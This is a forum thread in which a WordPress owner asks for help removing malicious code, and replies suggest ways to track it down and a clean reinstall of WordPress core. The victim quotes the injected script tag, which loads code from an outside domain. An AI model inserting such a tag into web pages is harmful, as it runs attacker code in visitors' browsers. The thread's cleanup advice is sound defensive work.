Help getting rid of virus on wordpress

by Dalun

Posted: 14 years ago 10 replies

PROGRAMMING

Hey

I have a wordpress site and right it has a malicous code in it. I can see the code in the view source page, but I can't find it in the editor.

I am using the default theme for wordpress.

Where is this code located so that I can get rid of it?

#rid #virus #wordpress

rwil02 14 years ago

Most likely inside index.php iteslf
- Thanks
Signature

Roger Willcocks
L-Space Design
Please vote to help me win a 3kW solar array
{{ DiscussionBoard.errors[2612611].message }}
Dalun 14 years ago

I have checked wordpress theme editor and my ftp manager. I dont see the malicious code in index.php

This is the code

<script src=http://parties-store.com/plugins/decoder.php >
- Thanks
{{ DiscussionBoard.errors[2612697].message }}
DigiSumo 14 years ago

Hello, WPAntiVirus may be of help to you. You can see here.
- Thanks
{{ DiscussionBoard.errors[2612851].message }}
iamsuneel 14 years ago

Install "Web Developer" addon in firefox and open the site again.

Enable Web developer and you can see the page code at the bottom of the browser.

You can point out where this malicious code is easily.

I think its in "header.php" file of the theme. Check it once.
- Thanks
{{ DiscussionBoard.errors[2612902].message }}
Dalun 14 years ago

how do i use the web develop to edit and remove the code?

i checked the header in editor, the code isnt in the spot where it is on the page view source.
- Thanks
{{ DiscussionBoard.errors[2612904].message }}
iamsuneel 14 years ago

Then it might have encoded and is being called at the time of page loading.

I checked "wp-include" files when I had a little similar kind of a problem.

Check the time stamps of every file in the core files. If anything looks absurd, have a look at that file.

But, do not modify it in any manner. Just let us know here.
- Thanks
{{ DiscussionBoard.errors[2612966].message }}
SteveJohnson 14 years ago
Here's an easy way to narrow down where the code is coming from:

First, switch themes. If the code disappears, then you'll know one of your theme files is the problem.

If it doesn't, disable ALL of your plugins. If the code goes away, start activating plugins one by one, checking your source code after each activation. When the code comes back, you'll know which plugin is the culprit.

If the code stays there after switching themes and deactivating all the plugins, you're going to have to take more drastic measures.

Reinstall WordPress:
Get the latest WordPress version from wordpress.org or from this link: http://wordpress.org/latest.zip

Unzip the files to a folder on your computer.

The following steps ensure that you have the latest version of the WP configuration file:
- Download wp-config.php from the server to your computer in the same folder as the fresh WP files, then open it in a text editor.
- In another window, open wp-config-sample.php from the fresh WordPress files.
- Copy your database connection information from wp-config.php to wp-config-sample.php.
- Get new authentication keys and salts from https://api.wordpress.org/secret-key/1.1/salt/; copy and paste them into wp-config-sample.php.
- Check wp-config.php for the database prefix; if it isn't 'wp_', make sure you put the correct value in -sample.php.
- Switch to wp-config.php, select all, then delete.
- From -sample.php, select all, copy, then paste into the now blank wp-config.php.
- Save wp-config.php, do NOT save -sample.php (by not saving, you're not overwriting the sample file in case you need it again).
Back up your database!

On your server, delete ALL of the core WP files and folders except for folder wp-content.

In the wp-content/themes folder, delete the default, classic, and twentyten folders, and index.php. In wp-content/plugins, delete folder akismet, files index.php and hello.php.

Upload the new files from your computer to your server.

Be sure to delete the files from your server instead of overwriting them - sometimes the overwrite fails and you're left with an old file.

In a browser, go to your Dashboard login address. If you were already at the current version of WP on your server, you'll see the login screen. If not, you'll see the 'database has to be upgraded' message. Click the button, wait for WP to do its thing.

Now, check your site.

If the code is gone, one by one reactivate your plugins and switch your theme back, checking each time to make sure the code stays away.

#############

If the above doesn't solve your problem, then you have some major issues either buried in your theme files or a plugin, or actually in the database records. If that is the case, you'll need to decide whether to spend the money to have a WP pro clean your install or whether you just want to trash the whole thing and start over.
- Thanks
- 1 reply
Signature

The 2nd Amendment, 1789 - The Original Homeland Security.

Gun control means never having to say, "I missed you."
{{ DiscussionBoard.errors[2616184].message }}
- CarloD. 14 years ago
  
  SQL Injection??? it's probably being stored in your database.
  
  Just an idea,
  
  Login to phpmyadmin and have a look at the tables.
  
  Thanks
  
  Signature
  
  {{ DiscussionBoard.errors[2616447].message }}
Dalun 14 years ago

ok thanks for the tips.

gonna try them out and see what happens.
- Thanks
{{ DiscussionBoard.errors[2617494].message }}
ryanhall789 14 years ago

Try switching your wordpress theme and if the codes disappear from the theme than can understand and come to know about the problem.
- Thanks
{{ DiscussionBoard.errors[2673890].message }}

Help getting rid of virus on wordpress

Trending Topics

Should i Index Author pages?

best high quality crypto traffic.

Some interesting stats about brand comms

Fixing a massive traffic drop after rebranding

Meta AI now has Google Search results